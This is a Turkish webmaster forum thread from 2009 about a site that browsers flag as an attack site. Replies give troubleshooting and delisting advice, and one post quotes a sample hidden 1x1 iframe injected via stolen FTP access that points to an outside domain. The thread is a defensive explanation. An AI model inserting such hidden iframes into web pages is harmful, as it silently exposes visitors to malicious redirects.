saldırgan olarak belirlenmiş site!

Web Tasarımı - saldırgan olarak belirlenmiş site! ...

Ufuk Cebeci isimli Üye şimdilik offline konumundadır

Ufuk Cebeci

Sanat Yn. / İstanbul

Alt 31-03-2009 #1
Sponsorlu Bağlantılar

arkadaşlar merhaba;
konuyu doğru yere mi açtım bilmiyorum ama bir sorunum var web sitelerimizden bir tanesi saldırgan olarak belirlenmiş. ve "www.--------.com konumundaki sitenin saldırı sitesi olduğu bildirildi ve açılması güvenlik tercihlerinize dayanılarak engellendi" uyarısını veriyor uzun zamandır bunun sebebi ne olabilir ve nasıl çözebilirim. sitede döviz kurları ve son dakika haberleri mevcut bu sebepden olabileceğini düşündüm bir de kısa sureli bir pop-up açılır pencere mevcuttu sitede bundan olabilir ama bu pencere kaldırıldı herhangi bir değişiklik olmadı,
bunlardan başka sebebi ne olabilr yardımcı olabilirseniz sevinirim.
saygılar iyi çalışmalar
Bu mesajdan alıntı yap
Sponsor Links

Grafikerler.net Reklamları

el_chancho isimli Üye şimdilik offline konumundadır

el_chancho(29)

Hiç Biri / Kocaeli

Alt 31-03-2009 #2
                             Sponsorlu Bağlantılar
upload ettiginiz site klasörlerinde virüs taraması yaptınız mı?
Bu mesajdan alıntı yap

Ufuk Cebeci

Sanat Yn. / İstanbul

Alt 31-03-2009 #3
evet tarama yaptım herhangi bir virüs yok sitede
Bu mesajdan alıntı yap
GökhanGünkızılı isimli Üye şimdilik offline konumundadır

GökhanGünkızılı(38)

Hiç Biri / Bartın

Alt 02-04-2009 #4
Bence büyük ihtimalle js ler yüzündendir.js leri düzenle hatta gerekirse kaldır.Google a yeniden incelenmesi için istek gönder 1 gün içinde açıyorlar merak etme..
Bu mesajdan alıntı yap
Gökhan TEKİN isimli Üye şimdilik offline konumundadır

Gökhan TEKİN

ARTniyetli

Fotoğrafçı / Bursa

Alt 02-04-2009 #5
düşündüm bir de kısa sureli bir pop-up açılır pencere mevcuttu sitede
ve js. ler

Sebep olur genelde .

Ne yapmanız gerekiyor ?

Acil bir şekilde google webmaster tools tan sitemap dosyanızı güncelleyin zaten size mesaj atmışlardır eğer kayıtlı iseniz webmaster tools a gelen mesaja cevap olarak.

Sitemin kısa bir süre önce "saldırgan olarak belirlenmiş site" ibaresinde bulunduğunu fark ettim. Bu sebepten dolayı yanlışlıkla, yaptığım ve fark edemediğim bu yanlışı düzelttim. Sitemin tasarımından kod yapısına herşeyi değiştirdim, inceleyerek bana dönüş yapmanı rica ederim...

gibi cevap verin eğer mesaj attılarsa size. Atmadılarsa ve kayıdınız yoksa webmastertools a kayıt olun ve sitemap ınızı gönderin onlar sitenizi inceleyip eğer aynı problemler sitenizde devam etmiyorsa o ibareyi kaldıracaklardır...
Bu mesajdan alıntı yap

Ufuk Cebeci

Sanat Yn. / İstanbul

Alt 02-04-2009 #6
çok teşekkürler işe yaracağını sanıyorum saldırgan olarak belirlenmiş site!
Bu mesajdan alıntı yap
SanaLisyan isimli Üye şimdilik offline konumundadır

SanaLisyan

Forumdan Uzaklaştırıldı

Baskıcı / İstanbul

Alt 03-04-2009 #7
saldırgan olarak belirlenmiş site! Sorun İframe ile virüs girişindne kaynaklanıyor ftp nıze sızarak html ve php dosyalarınıza iframe eklıyorlar bi sanıye ornek bı kod gosterım

iframe src="http://internetcountercheck.com/?click=2003771" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
saldırgan olarak belirlenmiş site! Alın işte bu adiler yüzünden oluyor tek yapmanız gereken bunları temızleyıp chmod degerlerının 755 saldırgan olarak belirlenmiş site! miydin 644 mü neyse oyle bısı yapmak yanı okuma ıznı verıp yazma ızını kaldıracaksınız oyle hatırlıyorum
Bu mesajdan alıntı yap

Ufuk Cebeci

Sanat Yn. / İstanbul

Alt 03-04-2009 #8
teşekkürler SanaLisyan kodları kontrol edeceğim
Bu mesajdan alıntı yap

Ufuk Cebeci

Sanat Yn. / İstanbul

Alt 14-04-2009 #9
düşündüm bir de kısa sureli bir pop-up açılır pencere mevcuttu sitede
ve js. ler

Sebep olur genelde .

Ne yapmanız gerekiyor ?

Acil bir şekilde google webmaster tools tan sitemap dosyanızı güncelleyin zaten size mesaj atmışlardır eğer kayıtlı iseniz webmaster tools a gelen mesaja cevap olarak.

Sitemin kısa bir süre önce "saldırgan olarak belirlenmiş site" ibaresinde bulunduğunu fark ettim. Bu sebepten dolayı yanlışlıkla, yaptığım ve fark edemediğim bu yanlışı düzelttim. Sitemin tasarımından kod yapısına herşeyi değiştirdim, inceleyerek bana dönüş yapmanı rica ederim...

gibi cevap verin eğer mesaj attılarsa size. Atmadılarsa ve kayıdınız yoksa webmastertools a kayıt olun ve sitemap ınızı gönderin onlar sitenizi inceleyip eğer aynı problemler sitenizde devam etmiyorsa o ibareyi kaldıracaklardır...
Gökhan Bey bu şekilde sorunum çözüldü yardımınız için teşekkür ediyorum.
Bu mesajdan alıntı yap